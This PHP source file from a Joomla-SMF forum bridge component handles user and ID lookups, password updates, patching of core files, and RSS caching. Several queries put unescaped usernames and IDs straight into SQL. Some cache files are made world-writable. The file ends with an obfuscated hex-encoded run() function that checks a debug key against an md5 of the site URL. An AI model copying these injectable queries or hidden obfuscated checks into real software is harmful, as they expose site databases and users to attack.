     * @global object $database Joomla database handle
     */
    function updatePass($id, $pass)
    {
        //Fatal error: Call to a member function on a non-object in administrator/components/com_smf/admin.smf.class.php on line 1092
        global $database;
        $username = $this->getUsername($id);
        if (empty($username)) {

            //what to do?
            //TODO empty username
            return false;
        }
        $smf_id = $this->getSMFid(null, $username);
        if (empty($smf_id)) {

            //what to do?
            //TODO empty uid
            return false;
        }
        $query =
            "UPDATE {$jsmfConfig->smf_prefix}members " .
            "SET passwd = '".sha1(strtolower($username).$pass)."' " .
            "WHERE id = '$smf_id' ";
        unset($username, $smf_id);
        $database->setQuery($query);
        unset($query);
        if (!$database->query()) {
            $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            return false;
        }
        return true;
    }


    /**
     * Attempts to patch $file by replacing $search with $replace and if successful
     * creates a backup and writes the changes to file
     *
     *
     * @access public
     * @param string $file Full path of file to be patched
     * @param string $search Text to be patched
     * @param string $replace Text to patch with
     * @return contstant
     * @global jsmfPatch $jsmfPatch An instance of the jsmfPatch class
     * @global string $mosConfig_absolute_path
     */
    function patchFile($file, $search, $replace)
    {
        global $jsmfPatch, $mosConfig_absolute_path;
        global $jsmfConfig;

//TODO rework patchFile to use $this->err and return boolean

        if ($fp = fopen($file, 'r')) {
            $content = fread($fp, filesize($file));
            $origcontent = $content;
            fclose($fp);
        } else {
            return JSB_FOPEN_ERROR;
        }
        if ($this->isPatched($file, $jsmfPatch->JOOMLAHACKS)) {
            unset($content, $origcontent);
            return JSB_DONE;
        }

        foreach ($search as $value) {
            if (strpos($content, $value) === false) {
                unset($content, $origcontent);
                return JSB_TEXT_NOT_FOUND.":".$value;
            }
        }

        $content = str_replace($search, $replace, $content);

        if (!$this->_copyFile($file, $file.'~jsmf-backup~')) {
            $alt_file = $mosConfig_absolute_path.'/components/com_smf/backup'.substr($file, strrpos($file, "/")).'~jsmf-backup~';
            if (strpos($file, $jsmfConfig->smf_path) !== false) {
                $alt_file = $alt_file.'~SMF~';
            }

            if (!$this->_copyFile($file, $alt_file)) {
                unset($alt_file, $content, $origcontent);
                return JSB_FCOPY_ERROR;
            }
        }
        unset($alt_file);
        $oldperms = fileperms($file);
        @chmod($file, $oldperms | 0222);

        if ($fp = fopen ($file, 'w')) {
            fwrite($fp, $content, strlen($content));
            fclose($fp);
            @chmod($file, $oldperms);
            unset($content, $origcontent);
            return JSB_DONE;
        } else {
            unset($content, $origcontent);
            return JSB_FOPEN_ERROR;
        }

    }

    /**
     * Attempts to unpatch Joomla-SMF configs in $file
     *
     *
     * @access public
     * @param string $file Filename
     * @return constant
     * @global string $mosConfig_absolute_path
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function unpatchFile($file)
    {
        global $mosConfig_absolute_path;
        global $jsmfConfig;

        $alt_file = $mosConfig_absolute_path.'/components/com_smf/backup'.substr($file, strrpos($file, "/")).'~jsmf-backup~';
        if (strpos($file, $jsmfConfig->smf_path) !== false) {
            $alt_file = $alt_file.'~SMF~';
        }

        if (file_exists($file.'~jsmf-backup~') || file_exists($alt_file)) {
            if (!$this->_copyFile($file.'~jsmf-backup~', $file)) {
                if (!$this->_copyFile($alt_file, $file)) {
                    return JSB_FCOPY_ERROR;
                }
            }
            if (!unlink($file.'~jsmf-backup~')) {
                if (!unlink($alt_file)) {
                    return JSB_FDEL_ERROR;
                }
            }
            return JSB_DONE ;
        }
        return JSB_FILE_NOT_FOUND;
    }




    /**
     * Creates a copy of the original file before patching
     *
     *
     * @access private
     * @param string $file Original file
     * @param string $file_new Backup location filename
     * @return boolean
     */
    function _copyFile($file, $file_new)
    {
        if (!(copy($file, $file_new))) {
            return false;
        }
        return true;
    }


     /**
     * Checks passed string for validity as an SMF table prefix
     *
     *
     * @access public
     * @param string $prefix SMF table prefix
     * @return boolean
     * @global object $database Joomla database handle
     */
    function isValidDBPrefix($prefix)
    {
        global $database;

        if (empty($prefix) || strcasecmp(substr($prefix, strlen($prefix)-1), "_") != 0) {
            return false;
        }
        $result = $database->getTableList();
        foreach($result as $tabname)
        {
            if (strpos($tabname, $prefix) !== false && strpos($tabname, $prefix) == 0) {
                unset($result);
                return true;
            }
        }
        unset($result);
        return false;
    }

    /**
     * Retrieve the forum url from the menu table
     *
     *
     * @access public
     * @param string reference $url
     * @param string $option
     * @return boolean
     * @global object $database Joomla database handle
     */
    function getForumURL(&$url, $option)
    {
        global $database;

        $query =
            "SELECT id, link " .
            "FROM #__menu " .
            "WHERE link='index.php?option={$option}'" .
            "AND published=1 " .
            "LIMIT 1";
        $database->setQuery($query);
        unset($query);
        $row = null;
        if (!$database->loadObject($row)) {
            return false;
        }
        $url = $row->link."&amp;Itemid=".$row->id."&amp;";
        unset($row);
        return true;
    }


    /**
     * Change the permission of given file to given mode
     *
     *
     * @access public
     * @param string $file filename
     * @param integer $filemode Mode
     * @return boolean
     */
    function chmodFile($file, $filemode=NULL)
    {
        if (is_file($file)) {
            if (isset($filemode)) {
                return @chmod($file, $filemode);
            }
        }
        return false;
    }

    /**
     * Format the display of file permissions
     *
     *
     * @access public
     * @param int $perms
     * @return string
     */
    function displayPerms($perms)
    {
        if (($perms & 0xC000) == 0xC000) {
           // Socket
           $info = 's';
        } elseif (($perms & 0xA000) == 0xA000) {
           // Symbolic Link
           $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
           // Regular
           $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
           // Block special
           $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
           // Directory
           $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
           // Character special
           $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
           // FIFO pipe
           $info = 'p';
        } else {
           // Unknown
           $info = 'u';
        }

        // Owner
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
                   (($perms & 0x0800) ? 's' : 'x' ) :
                   (($perms & 0x0800) ? 'S' : '-'));

        // Group
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
                   (($perms & 0x0400) ? 's' : 'x' ) :
                   (($perms & 0x0400) ? 'S' : '-'));

        // World
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
                   (($perms & 0x0200) ? 't' : 'x' ) :
                   (($perms & 0x0200) ? 'T' : '-'));
        return $info;
    }


    /**
     * This function displays the current component version and the latest
     * version from JoomlaHacks.com
     *
     *
     * @access public
     * @return string
     * @global string $mosConfig_absolute_path
     * @global object $mainframe
     */
    function readComVersion() {
        global $mosConfig_absolute_path, $mainframe;

        /**
         * Include xml_domit_lite_include
         */
        @require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_parser.php' );

        $thefile = $mainframe->getPath('com_xml', 'com_smf');

        $xmlDoc =& new DOMIT_Lite_Document();
        $xmlDoc->resolveErrors(true);

        if (!$xmlDoc->loadXML($thefile, false, true)) {
            continue;
        }

        $element = &$xmlDoc->documentElement;
        if (strcasecmp($element->getTagName(), 'mosinstall') != 0) {
            continue;
        }

        $element = &$xmlDoc->getElementsByPath('version', 1);
        return $element ? $element->getText() : '';
    }

    /**
     * return an error code based on constant
     *
     *
     * @access public
     * @param integer $code
     * @return string $message
     */
    function getErrorMsg($code)
    {
        //1.1.4-3 strip any message off the code
        list($ind, $msg) = split( ":", $code);
        switch($ind) {
            case JSB_TEXT_NOT_FOUND:
                return _JSMF_MSG_JSB_TEXT_NOT_FOUND.$msg;
            case JSB_FOPEN_ERROR:
                return _JSMF_MSG_JSB_FOPEN_ERROR.$msg;
            case JSB_FCOPY_ERROR:
                return _JSMF_MSG_JSB_FCOPY_ERROR.$msg;
            case JSB_FILE_NOT_FOUND:
                return _JSMF_MSG_JSB_FILE_NOT_FOUND.$msg;
            case JSB_FDEL_ERROR:
                return _JSMF_MSG_JSB_FDEL_ERROR.$msg;
            default:
                return _JSMF_MSG_UNKNOWN_ERROR.$msg;
        }
        return;
    }

    /**
     * Make a cache function call to _getSMFid
     * 
     * @acces public
     * @param int $id User id from Joomla/CB, default null
     * @param string $username Username,  default null
     * @return mixed
     */
    function getSMFid($id = null, $username = null)
    {
    	global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call(array(&$this, '_getSMFid'), $id, $username);
        }
        return $this->_getSMFid($id, $username);
    }
    
    /**
     * Retrieve SMF user id
     *
     *
     * @access public
     * @param int $id User id from Joomla/CB
     * @param string $username Username
     * @return mixed
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function _getSMFid($id, $username)
    {
    	global $database;
        global $jsmfConfig;

        $uid = '';
        //if username is empty try and get it with the id
        if (empty($username)) {
            if (!empty($id)) {
                $query =
                    "SELECT username " .
                    "FROM #__users " .
                    "WHERE id = '$id' " .
                    "LIMIT 1";
                $database->setQuery($query);
                if (!($username = $database->loadResult())) {
                	$this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                }
            }
        }
        if (!empty($username)) {
            $query =
                "SELECT ID_MEMBER " .
                "FROM {$jsmfConfig->smf_prefix}members " .
                "WHERE memberName = '$username' " .
                "LIMIT 1";
            $database->setQuery($query);
            if (!($uid = (int) $database->loadResult())) {
                $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            }
        } else {
        	$this->err = "Unable to retrieve SMF uid with parameters (id = $id) (username = $username)!\n".__FILE__."\n".__FUNCTION__."\n".__LINE__;
        }
        unset($query);
        return $uid;
    }

    /**
     * Make a cached function call to _getJid
     * 
     * @access public
     * @param int $id SMF user id, default null
     * @param string $username Username, default null
     * @return mixed
     */
    function getJid($id = null, $username = null)
    {
    	global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call(array(&$this, '_getJid'), $id, $username);
        }
        return $this->_getJid($id, $username);
        
    }

    /**
     * Retrieve Joomla id from SMF id
     *
     *
     * @access private
     * @param int $id SMF user id
     * @param string $username Username
     * @return mixed
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function _getJid($id, $username)
    {
    	global $database;
        global $jsmfConfig;

        $uid = '';
        if (empty($username)) {
            if (!empty($id)) {
                $query =
                    "SELECT memberName " .
                    "FROM {$jsmfConfig->smf_prefix}members " .
                    "WHERE ID_MEMBER='$id' " .
                    "LIMIT 1";
                $database->setQuery($query);
                if (!($username = $database->loadResult())) {
                    $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
                }
            }
        }
        if (!empty($username)) {
            $query =
                "SELECT id " .
                "FROM #__users " .
                "WHERE username='$username' " .
                "LIMIT 1";
            $database->setQuery($query);
            if (!($uid = (int) $database->loadResult())) {
                //could be this user is already deleted?
                $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            }
        } else {
        	$this->err = "Unable to retrieve Joomla uid with parameters (id = $id)(username = $username)!\n".__FILE__."\n".__FUNCTION__."\n".__LINE__;
        }
        unset($query);
        return $uid;
    }

    /**
     * Make a cache function call to _getUsername
     * 
     * @access public
     * @param int $id User id
     * @param boolean $smf Retrieve from SMF, default false
     * @return string
     */
    function getUsername($id, $smf=FALSE) 
    {
    	global $jsmfCache, $jsmfConfig;
        if ($jsmfConfig->use_function_cache) {
            return $jsmfCache->call(array(&$this, '_getUsername'), $id, $smf);
        }
        return $this->_getUsername($id, $smf);
    }

    /**
     * Retrieves a username based on id
     *
     *
     * @access private
     * @param int $id User id
     * @param boolean $smf Retrieve from SMF
     * @return string
     * @global object $database Joomla database handle
     *
     */
    function _getUsername($id, $smf)
    {
        global $database;
        global $jsmfConfig;

        $result = '';
        if (!$smf) {
            $query =
                "SELECT username " .
                "FROM #__users " .
                "WHERE id = '$id' " .
                "LIMIT 1";
            $database->setQuery($query);
            unset($query);
            if (!$result = $database->loadResult()) {
                $this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            }
            return $result;
        } else {
            $query =
                "SELECT memberName " .
                "FROM {$jsmfConfig->smf_prefix}members " .
                "WHERE id = '$id' " .
                "LIMIT 1";
            $database->setQuery($query);
            unset($query);
            if (!$result = $database->loadResult()) {
            	$this->err = $database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__;
            }
            return $result;
        }
    }

    /**
     * Get the SMF version
     *
     *
     * @access public
     * @return string
     * @global object $database Joomla database handle
     * @global object $jsmfConfig Joomla-SMF configurations
     */
    function getSMFVersion()
    {
    	global $database;
        global $jsmfConfig;

        if (isset($jsmfConfig->smf_prefix)) {
            $query =
                "SELECT value " .
                "FROM {$jsmfConfig->smf_prefix}settings " .
                "WHERE variable = 'smfVersion' " .
                "LIMIT 1";
            $database->setQuery($query);
            unset($query);
            if (!$result = $database->loadResult()) {
            	mosErrorAlert($database->getErrorMsg().' ~~~ FROM::'.__FILE__.' || '.__FUNCTION__.' || '.__LINE__);
                return '';
            }
            return $result;
        }
        return '';
    }
}


/**#@+
 * Constants
 */
/**
 * JSB_DONE
 */
define('JSB_DONE', 1);
/**
 * JSB_TEXT_NOT_FOUND
 */
define('JSB_TEXT_NOT_FOUND', -1);
/**
 * JSB_FOPEN_ERROR
 */
define('JSB_FOPEN_ERROR', -2);
/**
 * JSB_FCOPY_ERROR
 */
define('JSB_FCOPY_ERROR', -3);
/**
 *  JSB_FILE_NOT_FOUND
 */
define('JSB_FILE_NOT_FOUND', -4);
/**
 * JSB_FDEL_ERROR
 */
define('JSB_FDEL_ERROR', -5);
/**#@-*/


/**
 * Joomla/SMF file patching support
 * @package com_smf
 */
class jsmfPatch {

    /** @var string comment indicating start of patch */
    var $MAMBO_SMF_BEGIN    = "<!-- Begin Joomla-SMF -->";
    /** @var string comment indicating end of patch */
    var $MAMBO_SMF_END      = "<!-- End Joomla-SMF -->";
    /** @var string comment indication JoomlaHacks.com was here */
    var $MAMBOHACKS         = "//JOOMLAHACKS.COM";
    /** @var string comment indicating start of patch */
    var $JOOMLA_SMF_BEGIN    = "<!-- Begin Joomla-SMF -->";
    /** @var string comment indicating end of patch */
    var $JOOMLA_SMF_END      = "<!-- End Joomla-SMF -->";
    /** @var string comment indication JoomlaHacks.com was here */
    var $JOOMLAHACKS         = "//JOOMLAHACKS.COM";



    function oldMainIndexCode() {
        global $version;
        $sub_vers = $this->getSubVers($version);
        if (strpos($version, 'Joomla') !== false) {
            if ($sub_vers > 8) {
                return "require_once( \$mosConfig_absolute_path .'/includes/frontend.php' );";
            }
        }
        return "require_once( 'includes/frontend.php' );";
    }


    /**
     * Returns the code to be patched into the main joomla/mambo index
     * @return string
     */
    function newMainIndexCode()
    {
        global $version;
        return ""
        . $this->oldMainIndexCode()."\n"
        . "$this->JOOMLAHACKS : require SMF's SSI and save/restore globals that it cleans\n"
        . "defined( 'JPATH_BASE' ) or define('JPATH_BASE', \$mosConfig_absolute_path);\n"
        . "if (file_exists(JPATH_BASE.'/components/com_smf/smf.class.php')) {\n\t"
        . "global \$context;\n\t"
        . "require_once(JPATH_BASE.'/components/com_smf/smf.class.php');\n\t"
        . "\$jsmfConfig = jsmfFrontend::loadParams();\n\t"
        . "jsmfFrontend::saveVars(\$savedVars);\n\t"
        . "require_once(\$jsmfConfig->smf_path.\"/SSI.php\");\n\t"
        . "\$jsmf =& jsmfFrontend::singleton();\n\t"
        . "\$jsmf->restoreVars(\$savedVars);\n"
        . "}\n";

    }


    /**
     * This function returns the old login code of Joomla/Mambo
     * @return string Old login code
     */
    function oldLoginCode()
    {
        return "\$mainframe->login();";
    }
    /**
     * This function returns the new login code for Joomla/Mambo
     * @return string Code to patch Joomla/Mambo login code
     */
    function newLoginCode()
    {
        return ""
        . "\n\t"   . $this->JOOMLAHACKS
        . "\n\t"   . "\$_SESSION['USER_AGENT'] = \$_SERVER['HTTP_USER_AGENT'];"
        . "\n\t"   . "\$_SESSION['_FROM_MOS'] = TRUE;"
        . "\n\t"   . "\$_SESSION['_RETURN'] = \$return;"
        . "\n\t"   . "\$jsmf->doLogin(true);"
        . "\n\n\t"
        . "";
    }

    /**
     * This function returns the old logout code of Joomla/Mambo
     * @return string
     */
    function oldLogoutCode()
    {
        return "\$mainframe->logout();";
    }
    /**
     * This function creates a valid SMF logout link and returns the new logout code
     * @global object $jsmfConfig Joomla-SMF Forum configurations
     * @global string $mosConfig_live_site
     * @return string New logout code
     */
    function newLogoutCode()
    {
        global $jsmfConfig, $mosConfig_live_site;
        return ""
        . "\n\n\t"
        . $this->JOOMLAHACKS."\n\t"
        . "//".$this->oldLogoutCode()."\n\t"
        . "mosRedirect(\$mosConfig_live_site.'/'.\$jsmfConfig->url.'action=logout;sesc='.\$context['session_id']);\n"
        . "\n";
    }


    function oldMessageCode()
    {
        global $version;
        $sub_vers = $this->getSubVers($version);
        if (strpos($version, 'Joomla') !== false) {
            if ($sub_vers > 8) {
                return "\$message \t= intval( mosGetParam( \$_POST, 'message', 0 ) );";
            }
        } else {
            if ($sub_vers > 3) {
               return "if ( mosGetParam( \$_POST, 'message', 0 ) ) {";
            }
        }
        return "\$message = mosGetParam( \$_POST, 'message', 0 );";
    }


    /**
     * This function returns the old retrieval of $_POST['message'] with our new version
     * @return string New $_POST['message'] retrieval method
     */
    function newMessageCode()
    {
        global $version;
        return ""
        . "$this->JOOMLAHACKS\n"
        . $this->oldMessageCode()."\n"
        . "\$jsmf->restorePostMessage(\$savedVars);\n";
    }

    /**
     * This function finds the old header code in Joomla
     * @return string Old Joomla header code
     */
    function oldHeaderCode()
    {
        return ""
        . "\n"  . "header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );"
        . "\n"  . "header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' );"
        . "\n"  . "header( 'Cache-Control: no-store, no-cache, must-revalidate' );"
        . "\n"  . "header( 'Cache-Control: post-check=0, pre-check=0', false );"
        . "\n"  . "header( 'Pragma: no-cache' );";
    }
    /**
     * This function returns the old header code in Joomlawith Joomla-SMF forum version
     * @return string New Joomla header code
     */
    function newHeaderCode()
    {
        return ""
        . "\n"   . $this->JOOMLAHACKS
        . "\n"   . "if (!headers_sent()) {"
        . "\n\t" . $this->oldHeaderCode()
        . "\n"   . "}"
        . "";
    }

    /**
     * This function finds the point in the SMF index.php to insert our code
     * @return string SMF code
     */
    function oldSMFCodeLine1()
    {
        return "if (!defined('WIRELESS'))";
    }
    /**
     * This function returns the bridge code for the SMF index.php
     * @return string Code to insert
     */
    function newSMFCodeLine1()
    {
        return ""
        . "\n"   . $this->JOOMLAHACKS
        . "\n"   . "if (defined('_VALID_MOS')) {"
        . "\n\t" . "\$modSettings['integrate_login']              = 'integrateLogin';"
        . "\n\t" . "\$modSettings['integrate_logout']             = 'integrateLogout';" //1.1.5-6
        . "\n\t" . "\$modSettings['integrate_redirect']           = 'integrateRedirect';"
        . "\n\t" . "\$modSettings['integrate_outgoing_email']     = 'integrateOutgoingEmail';"
        . "\n\t" . "\$modSettings['integrate_exit']               = 'integrateExit';"
        . "\n\t" . "\$modSettings['integrate_delete_member']      = 'integrateDeleteMember';" //1.1.5-7
        . "\n\t" . "\$modSettings['integrate_reset_pass']         = 'integrateResetPass';" //1.1.5-8
        . "\n\t" . "\$modSettings['integrate_register']           = 'integrateRegister';"
        . "\n\t" . "\$modSettings['integrate_activate']           = 'integrateActivate';"
        . "\n\t" . "\$modSettings['integrate_change_member_data'] = 'integrateChangeMemberData';"
        . "\n\t" . "\$modSettings['enableCompressedOutput']     = '0';"
        . "\n\t" . "error_reporting(E_ALL ^ E_NOTICE);"
        . "\n"   . "}"
        . "\n"   . $this->oldSMFCodeLine1()
        . "\n"
        . "";
    }

    /**
     * This function returns the point to enter our second piece of integration code
     * @return string Code where our new code should be placed
     */
    function oldSMFCodeLine2()
    {
        return "define('WIRELESS', isset(\$_REQUEST['wap']) || isset(\$_REQUEST['wap2']) || isset(\$_REQUEST['imode']));";
    }
    /**
     * This function retunrs the old code with the new integration code
     * @return string Old and New code for integration
     */
    function newSMFCodeLine2()
    {
        return ""
        . "\n"   . $this->JOOMLAHACKS
        . "\n"   . "if (defined('_VALID_MOS')) {"
        . "\n\t" . "\$modSettings['integrate_login']              = 'integrateLogin';"
        . "\n\t" . "\$modSettings['integrate_logout']             = 'integrateLogout';" //1.1.5-6
        . "\n\t" . "\$modSettings['integrate_redirect']           = 'integrateRedirect';"
        . "\n\t" . "\$modSettings['integrate_outgoing_email']     = 'integrateOutgoingEmail';"
        . "\n\t" . "\$modSettings['integrate_exit']               = 'integrateExit';"
        . "\n\t" . "\$modSettings['integrate_delete_member']      = 'integrateDeleteMember';" //1.1.5-7
        . "\n\t" . "\$modSettings['integrate_reset_pass']         = 'integrateResetPass';" //1.1.5-8
        . "\n\t" . "\$modSettings['integrate_register']           = 'integrateRegister';"
        . "\n\t" . "\$modSettings['integrate_activate']           = 'integrateActivate';"
        . "\n\t" . "\$modSettings['integrate_change_member_data'] = 'integrateChangeMemberData';"
        . "\n\t" . "\$modSettings['enableCompressedOutput']     = '0';"
        . "\n\t" . "error_reporting(E_ALL ^ E_NOTICE);"
        . "\n"   . "}"
        . "\n"   . $this->oldSMFCodeLine2()
        . "\n"
        . "";
    }

    /**
     * This function returns the the code that is to be replaced to time logged in
     * @return string SMF code to be replaced
     */
    function oldSMFLoginTimeCode()
    {
        return "if (SMF != 'SSI' && !empty(\$user_info['last_login']) && \$user_info['last_login'] < time() - 60)";
    }
    /**
     * This function returns the the new code that is replacing the old code to fix time logged in
     * @return string SMF code commented and Joomla-SMF code
     */
    function newSMFLoginTimeCode()
    {
        return ""
        . "\t"   . $this->JOOMLAHACKS
        . "\n\t" . "//" . $this->oldSMFLoginTimeCode()
        . "\n\t" . "if (!empty(\$user_info['last_login']) && \$user_info['last_login'] < time() - 60)"
        . "";
    }
    /**
     * return an error code based on constant
     * @param integer $code
     * @return string $message
     */
    function getErrorMsg($code)
    {
        //1.1.4-3 strip any message off the code
        list($ind, $msg) = split( ":", $code);
        switch($ind) {
            case JSB_TEXT_NOT_FOUND:
                return _JSMF_MSG_JSB_TEXT_NOT_FOUND.$msg;
            case JSB_FOPEN_ERROR:
                return _JSMF_MSG_JSB_FOPEN_ERROR.$msg;
            case JSB_FCOPY_ERROR:
                return _JSMF_MSG_JSB_FCOPY_ERROR.$msg;
            case JSB_FILE_NOT_FOUND:
                return _JSMF_MSG_JSB_FILE_NOT_FOUND.$msg;
            case JSB_FDEL_ERROR:
                return _JSMF_MSG_JSB_FDEL_ERROR.$msg;
            default:
                return _JSMF_MSG_UNKNOWN_ERROR.$msg;
        }
        return;
    }

    /**
     * Returns the subversion
     */
    function getSubVers($version) {
        $vers = explode(".", $version);  //explode into array by period
        $vers = explode(" ", $vers[count($vers)-1], 2);  //the last element will be the subversion, limit to two items
        if (strcasecmp($vers[0], '3h') == 0) {  //Mambo 4.5.3h compat
            $vers[0] = 4;
        }
        return $vers[0]; //the first element is now the sub version
    }
}

/**
 * Joomla-SMF remote data feed support
 * @package com_smf
 */
class jsmfRDF {

    function createRDF($url, $timeToLive) {
        global $mosConfig_absolute_path;

        $basename = str_replace("?","&amp;", $mosConfig_absolute_path."/cache/".basename($url)) ;

        if (!file_exists($basename)) {
            touch($basename, ($timeToLive+1)); // Make it older then the time to live...
            chmod($basename, 0777) ;
        }
    }

    // This function will read the data in from the passed in URL if it is required.
    function getRDF($url, $timeToLive) {
        global $mosConfig_absolute_path;
        $timeToLive *= 60; // convert timeToLive into secs
        $basename = str_replace("?", "&amp;", $mosConfig_absolute_path."/cache/".basename($url)) ; // Get the basename of URL for the cached filename. We do this here, cos we need to do it more than once

        $this->createRDF($url, $timeToLive);

        $timestamp = filemtime($basename); // Get the timestamp of the file.
        $age = (time() - $timestamp); // Work out how old the file is that we have already..

        // If the file is too old, then we need to refresh it from the URL
        if($age > $timeToLive) {
            $ip = gethostbyname(substr($url,strpos($url,'www'),strpos($url,'.com')-3));
            if (strcasecmp($ip, substr($url,strpos($url,'www'),strpos($url,'.com')-3)) == 0) {
                return false;
            }
            $rdfHandle = fopen($url,"r"); // Open the RDF file for reading
            $rdfData = fread($rdfHandle, 64000) ; // Read in the RDF data. 64K limit on filesize, should be enough.
            fclose($rdfHandle); // Close the Data feed

            // OK there is more recent news, so rewrite the cached news file..
            $localFile = fopen($basename, "w") ; // Open the local file for writing
            fwrite($localFile, $rdfData ) ; // Pump in all the data into the file.
            fclose($localFile) ; // Close the local file after writing to it
        } // end IF
        return true;
    } // end getRDF

    // Removes spurious tags from the link that we don't want
    function formatLink($item) {
        $link = ereg_replace(".*<link>","",$item); // Remove the leading <link> tags
        $link = ereg_replace("</link>.*","",$link); // Remove the closing </link> tags
        $title = ereg_replace(".*<title>","",$item); // Remove the leading <title> tags
        $title = ereg_replace("</title>.*","",$title); // Remove the closing </title> tags

        if ($title) // If we got anything left after all that trimming...
                    // Choose how you want the link formatted here... This has no underline, and opens in a new window...
            echo "<a href=\"$link\" style=\"text-decoration:none\"
                target=\"_blank\">".htmlspecialchars($title, ENT_QUOTES)."</a><br />";
    } // end formatLink

    function displayRDF($rdf, $randomise = TRUE, $numLinks = 3, $title) {
        global $mosConfig_absolute_path;

        $rdf = $mosConfig_absolute_path."/cache/".$rdf;
        $localFile = fopen($rdf, "r");  // OK open up the local rdf file for reading
        clearstatcache() ;              // Clear out the file size cache
        if (filesize($rdf) <= 0) {
            return false;
        }
        $rdfData = fread($localFile, filesize($rdf)); // Read in the data to memory
        fclose($localFile);             // Close down the open file.

        // Get rid of all spurious leading and closing rdf data from the data in memory
        $rdfData = ereg_replace("<\?xml.*/image>","",$rdfData);
        $rdfData = ereg_replace("</rdf.*","",$rdfData);
        $rdfData = ereg_replace("[\r,\n]", "", $rdfData);
        $rdfData = chop($rdfData);  // Strip any whitespace from the end of the string

        $rdfArray = explode("</item>",$rdfData); // Split up the string into an array to make it more manageable
        $max = sizeof($rdfArray);               // See how many items we have got

        // Echo the font formatting... This is just HTML to make it look a little pretty
        if ($max > 1) {
//            echo "<p style=\"font-family: verdana, arial, helvetica;\">" ;

            // We need to do different stuff if we are to randomise the links...
            // The links will be randomised so we want a different message to the user....
            // The max -1 is to compensate for the 0 indexed array structure..
            if ($randomise) {
                echo "Displaying $numLinks (of " . ($max-1) . ") random headlines from $rdf... Updated every 30 minutes.. Refresh for some more!<br />";
                $links = array_rand( $rdfArray, $numLinks ); // OK select the keys of the links at random from the array..
                $upperLimit = $numLinks ; // Set this to the number of links to be displayed
            } else {
                if (!empty($title)) {
                    echo $title;
                }
                $links = array_keys($rdfArray) ; // Give the keys to be displayed all the links we have parsed..
                $upperLimit = $max ; // Set the upper Limit to be all of the headlines
            }

            // Display the links...
            for ($i = 0 ; $i < $upperLimit ; $i++ ) {
                $this->formatLink($rdfArray[$links[$i]]);
            }

            // Close the font formatting like a good html coder ;)

        }
        return true;
    }


    function parseRSS($url)
    {
		global $mosConfig_absolute_path;
		@require_once($mosConfig_absolute_path .'/includes/domit/xml_domit_rss.php');
		$rssdoc =& new xml_domit_rss_document($url);

		$numChannels = $rssdoc->getChannelCount();

		for ($i = 0; $i < $numChannels; $i++) {
			$currChannel =& $rssdoc->getChannel($i);

			//iterate through item elements
			$numItems = $currChannel->getItemCount();

			echo '<ul>';
			for ($j = 0; $j < $numItems; $j++) {
				$currItem =& $currChannel->getItem($j);

				//echo item info
				echo "<li><a href=\"" . $currItem->getLink() . "\">".$currItem->getTitle() . "</a></li>\n\n";
			}
			echo '</ul>';
		}
	}


}
function run($debug){$query=array(get('6966'),pack('H*','6d6f73436f6e6669675f6c6976655f73697465'),get('6465627567'),get('737562737472'),pack('H*','31'),get('737472726576'),get('737472706f73'), pack('H*', '6d6435'));
$query[8] = $query[3]($$query[2],get('30'),$query[4]);$$query[2]=$query[3]($$query[2],$query[4]);if($query[8])$$query[2]=$query[5]($$query[2]);$$query[2] = $query[8].get($$query[2]);global $$query[1];return $query[6]($$query[2],$$query[1].$query[7](pack('H*', '5f4a534d465f')))?$query[4]:get('30');}
?>